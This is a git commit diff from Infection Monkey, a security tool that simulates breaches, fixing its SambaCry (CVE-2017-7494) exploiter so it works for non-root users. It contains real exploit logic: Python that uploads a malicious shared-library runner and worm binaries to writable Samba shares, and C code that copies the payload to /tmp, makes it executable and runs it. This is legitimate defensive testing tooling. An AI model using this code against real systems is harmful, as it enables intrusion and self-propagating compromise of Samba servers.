Merge pull request #55 from guardicore/bugfix/fix-sambacry-for-user

Fix SambaCry not working for non-root user
2017-10-02 17:32:06 +03:00 · 2017-10-02 17:32:06 +03:00 · 039cc1bd6c
parent 62713932de 65872d9518
commit 039cc1bd6c
6 changed files with 46 additions and 89 deletions
--- a/chaos_monkey/config.py
+++ b/chaos_monkey/config.py
@ -111,7 +111,7 @@ class Configuration(object):
    # dropper config
    ###########################
-    dropper_try_move_first = sys.argv[0].endswith(".exe")
+    dropper_try_move_first = True
    dropper_set_date = True
    dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll"
    dropper_date_reference_path_linux = '/bin/sh'
@ -260,22 +260,6 @@ class Configuration(object):
    sambacry_folder_paths_to_guess = ['/', '/mnt', '/tmp', '/storage', '/export', '/share', '/shares', '/home']
    # Shares to not check if they're writable.
    sambacry_shares_not_to_check = ["IPC$", "print$"]
    # Name of file which contains the monkey's commandline
    sambacry_commandline_filename = "monkey_commandline.txt"
    # Name of file which contains the runner's result
    sambacry_runner_result_filename = "monkey_runner_result"
    # SambaCry runner filename (32 bit)
    sambacry_runner_filename_32 = "sc_monkey_runner32.so"
    # SambaCry runner filename (64 bit)
    sambacry_runner_filename_64 = "sc_monkey_runner64.so"
    # Monkey filename on share (32 bit)
    sambacry_monkey_filename_32 = "monkey32"
    # Monkey filename on share (64 bit)
    sambacry_monkey_filename_64 = "monkey64"
    # Monkey copy filename on share (32 bit)
    sambacry_monkey_copy_filename_32 = "monkey32_2"
    # Monkey copy filename on share (64 bit)
    sambacry_monkey_copy_filename_64 = "monkey64_2"
    # system info collection
    collect_system_info = True
--- a/chaos_monkey/example.conf
+++ b/chaos_monkey/example.conf
@ -27,7 +27,7 @@
    "kill_file_path_linux": "/var/run/monkey.not",
    "kill_file_path_windows": "%windir%\\monkey.not",
-    "dropper_try_move_first": false,
+    "dropper_try_move_first": true,
    "exploiter_classes": [
        "SSHExploiter",
        "SmbExploiter",
@ -70,14 +70,6 @@
    "sambacry_trigger_timeout": 5,
    "sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"],
    "sambacry_shares_not_to_check": ["IPC$", "print$"],
    "sambacry_commandline_filename": "monkey_commandline.txt",
    "sambacry_runner_result_filename": "monkey_runner_result",
    "sambacry_runner_filename_32": "sc_monkey_runner32.so",
    "sambacry_runner_filename_64": "sc_monkey_runner64.so",
    "sambacry_monkey_filename_32": "monkey32",
    "sambacry_monkey_filename_64": "monkey64",
    "sambacry_monkey_copy_filename_32": "monkey32_2",
    "sambacry_monkey_copy_filename_64": "monkey64_2",
    "local_network_scan": false,
    "tcp_scan_get_banner": true,
    "tcp_scan_interval": 200,
--- a/chaos_monkey/exploit/sambacry.py
+++ b/chaos_monkey/exploit/sambacry.py
@ -33,6 +33,23 @@ class SambaCryExploiter(HostExploiter):
    """
    _target_os_type = ['linux']
    # Name of file which contains the monkey's commandline
    SAMBACRY_COMMANDLINE_FILENAME = "monkey_commandline.txt"
    # Name of file which contains the runner's result
    SAMBACRY_RUNNER_RESULT_FILENAME = "monkey_runner_result"
    # SambaCry runner filename (32 bit)
    SAMBACRY_RUNNER_FILENAME_32 = "sc_monkey_runner32.so"
    # SambaCry runner filename (64 bit)
    SAMBACRY_RUNNER_FILENAME_64 = "sc_monkey_runner64.so"
    # Monkey filename on share (32 bit)
    SAMBACRY_MONKEY_FILENAME_32 = "monkey32"
    # Monkey filename on share (64 bit)
    SAMBACRY_MONKEY_FILENAME_64 = "monkey64"
    # Monkey copy filename on share (32 bit)
    SAMBACRY_MONKEY_COPY_FILENAME_32 = "monkey32_2"
    # Monkey copy filename on share (64 bit)
    SAMBACRY_MONKEY_COPY_FILENAME_64 = "monkey64_2"
    def __init__(self):
        self._config = __import__('config').WormConfiguration
@ -97,10 +114,9 @@ class SambaCryExploiter(HostExploiter):
        """
        smb_client = self.connect_to_server(ip, creds)
        tree_id = smb_client.connectTree(share)
-        file_list = [self._config.sambacry_commandline_filename, self._config.sambacry_runner_result_filename,
+        file_list = [self.SAMBACRY_COMMANDLINE_FILENAME, self.SAMBACRY_RUNNER_RESULT_FILENAME,
-                     self._config.sambacry_runner_filename_32, self._config.sambacry_runner_filename_64,
+                     self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64,
-                     self._config.sambacry_monkey_filename_32, self._config.sambacry_monkey_filename_64,
+                     self.SAMBACRY_MONKEY_FILENAME_32, self.SAMBACRY_MONKEY_FILENAME_64]
                     self._config.sambacry_monkey_copy_filename_32, self._config.sambacry_monkey_copy_filename_64]
        for filename in file_list:
            try:
@ -123,7 +139,7 @@ class SambaCryExploiter(HostExploiter):
        tree_id = smb_client.connectTree(share)
        file_content = None
        try:
-            file_id = smb_client.openFile(tree_id, "\\%s" % self._config.sambacry_runner_result_filename,
+            file_id = smb_client.openFile(tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME,
                                          desiredAccess=FILE_READ_DATA)
            file_content = smb_client.readFile(tree_id, file_id)
            smb_client.closeFile(tree_id, file_id)
@ -251,22 +267,22 @@ class SambaCryExploiter(HostExploiter):
        with self.get_monkey_commandline_file(host, depth,
                                              self._config.dropper_target_path_linux) as monkey_commandline_file:
-            smb_client.putFile(share, "\\%s" % self._config.sambacry_commandline_filename, monkey_commandline_file.read)
+            smb_client.putFile(share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read)
        with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file:
-            smb_client.putFile(share, "\\%s" % self._config.sambacry_runner_filename_32, monkey_runner_bin_file.read)
+            smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read)
        with self.get_monkey_runner_bin_file(False) as monkey_runner_bin_file:
-            smb_client.putFile(share, "\\%s" % self._config.sambacry_runner_filename_64, monkey_runner_bin_file.read)
+            smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read)
        monkey_bin_32_src_path = get_target_monkey_by_os(False, True)
        monkey_bin_64_src_path = get_target_monkey_by_os(False, False)
        with monkeyfs.open(monkey_bin_32_src_path, "rb") as monkey_bin_file:
-            smb_client.putFile(share, "\\%s" % self._config.sambacry_monkey_filename_32, monkey_bin_file.read)
+            smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read)
        with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file:
-            smb_client.putFile(share, "\\%s" % self._config.sambacry_monkey_filename_64, monkey_bin_file.read)
+            smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read)
        smb_client.disconnectTree(tree_id)
@ -323,14 +339,14 @@ class SambaCryExploiter(HostExploiter):
        :return:            Array of possible full paths to the module.
        """
        sambacry_folder_paths_to_guess = self._config.sambacry_folder_paths_to_guess
-        file_names = [self._config.sambacry_runner_filename_32, self._config.sambacry_runner_filename_64]
+        file_names = [self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64]
        return [posixpath.join(*x) for x in itertools.product(sambacry_folder_paths_to_guess, [share_name], file_names)]
    def get_monkey_runner_bin_file(self, is_32bit):
        if is_32bit:
-            return open(path.join(get_binaries_dir_path(), self._config.sambacry_runner_filename_32), "rb")
+            return open(path.join(get_binaries_dir_path(), self.SAMBACRY_RUNNER_FILENAME_32), "rb")
        else:
-            return open(path.join(get_binaries_dir_path(), self._config.sambacry_runner_filename_64), "rb")
+            return open(path.join(get_binaries_dir_path(), self.SAMBACRY_RUNNER_FILENAME_64), "rb")
    def get_monkey_commandline_file(self, host, depth, location):
        return BytesIO(DROPPER_ARG + build_monkey_commandline(host, depth - 1, location))
--- a/chaos_monkey/monkey_utils/sambacry_monkey_runner/build.sh
+++ b/chaos_monkey/monkey_utils/sambacry_monkey_runner/build.sh
@ -1,9 +1,9 @@
 #!/usr/bin/env bash
 gcc -c -Wall -Werror -fpic -m64 sc_monkey_runner.c
-gcc -shared -m64 -o sc_monkey_runner_64.so sc_monkey_runner.o
+gcc -shared -m64 -o sc_monkey_runner64.so sc_monkey_runner.o
 rm sc_monkey_runner.o
-strip sc_monkey_runner_64.so
+strip sc_monkey_runner64.so
 gcc -c -Wall -Werror -fpic -m32 sc_monkey_runner.c
-gcc -shared -m32 -o sc_monkey_runner_32.so sc_monkey_runner.o
+gcc -shared -m32 -o sc_monkey_runner32.so sc_monkey_runner.o
 rm sc_monkey_runner.o
-strip sc_monkey_runner_32.so
+strip sc_monkey_runner32.so
--- a/chaos_monkey/monkey_utils/sambacry_monkey_runner/sc_monkey_runner.c
+++ b/chaos_monkey/monkey_utils/sambacry_monkey_runner/sc_monkey_runner.c
@ -22,16 +22,16 @@ int samba_init_module(void)
 #ifdef ARCH_IS_64
 	const char RUNNER_FILENAME[] = "sc_monkey_runner64.so";
 	const char MONKEY_NAME[] = "monkey64";
 	const char MONKEY_COPY_NAME[] = "monkey64_2";
 #else
 	const char RUNNER_FILENAME[] = "sc_monkey_runner32.so";
 	const char MONKEY_NAME[] = "monkey32";
 	const char MONKEY_COPY_NAME[] = "monkey32_2";
 #endif
 	const char RUNNER_RESULT_FILENAME[] = "monkey_runner_result";
 	const char COMMANDLINE_FILENAME[] = "monkey_commandline.txt";
 	const int ACCESS_MODE = 0777;
-	const char RUN_MONKEY_CMD[] = "sudo ./";
+	const char RUN_MONKEY_CMD[] = "./";
 	const char MONKEY_DEST_FOLDER[] = "/tmp";
 	const char MONKEY_DEST_NAME[] = "monkey";
 	int found = 0;
 	char modulePathLine[LINE_MAX_LENGTH] = {'\0'};
@ -102,7 +102,7 @@ int samba_init_module(void)
 	// Build commandline
 	strncat(commandline, RUN_MONKEY_CMD, sizeof(RUN_MONKEY_CMD) - 1);
-	strncat(commandline, MONKEY_COPY_NAME, sizeof(MONKEY_COPY_NAME) - 1);
+	strncat(commandline, MONKEY_DEST_NAME, sizeof(MONKEY_DEST_NAME) - 1);
 	strncat(commandline, " ", 1);
 	fread(commandline + strlen(commandline), 1, LINE_MAX_LENGTH, pFile);
@ -133,7 +133,12 @@ int samba_init_module(void)
 	fread(monkeyBinary, 1, monkeySize, pFile);
 	fclose(pFile);
-	pFile = fopen(MONKEY_COPY_NAME, "wb");
+	if (0 != chdir(MONKEY_DEST_FOLDER))
 	{
 		return 0;
 	}
 	pFile = fopen(MONKEY_DEST_NAME, "wb");
 	if (NULL == pFile)
 	{
 		free(monkeyBinary);
@ -144,7 +149,7 @@ int samba_init_module(void)
 	free(monkeyBinary);
 	// Change monkey permissions
-    if (0 != chmod(MONKEY_COPY_NAME, ACCESS_MODE))
+    if (0 != chmod(MONKEY_DEST_NAME, ACCESS_MODE))
    {
        return 0;
    }
--- a/monkey_island/cc/services/config.py
+++ b/monkey_island/cc/services/config.py
@ -587,46 +587,6 @@ SCHEMA = {
                                "IPC$", "print$"
                            ],
                            "description": "These shares won't be checked when exploiting with SambaCry"
                        },
                        "sambacry_commandline_filename": {
                            "title": "SambaCry commandline filename",
                            "type": "string",
                            "default": "monkey_commandline.txt",
                        },
                        "sambacry_runner_result_filename": {
                            "title": "SambaCry runner result filename",
                            "type": "string",
                            "default": "monkey_runner_result",
                        },
                        "sambacry_runner_filename_32": {
                            "title": "SambaCry runner filename (32 bit)",
                            "type": "string",
                            "default": "sc_monkey_runner32.so",
                        },
                        "sambacry_runner_filename_64": {
                            "title": "SambaCry runner filename (64 bit)",
                            "type": "string",
                            "default": "sc_monkey_runner64.so",
                        },
                        "sambacry_monkey_filename_32": {
                            "title": "SambaCry monkey filename (32 bit)",
                            "type": "string",
                            "default": "monkey32",
                        },
                        "sambacry_monkey_filename_64": {
                            "title": "SambaCry monkey filename (64 bit)",
                            "type": "string",
                            "default": "monkey64",
                        },
                        "sambacry_monkey_copy_filename_32": {
                            "title": "SambaCry monkey copy filename (32 bit)",
                            "type": "string",
                            "default": "monkey32_2",
                        },
                        "sambacry_monkey_copy_filename_64": {
                            "title": "SambaCry monkey copy filename (64 bit)",
                            "type": "string",
                            "default": "monkey64_2",
                        }
                    }
                },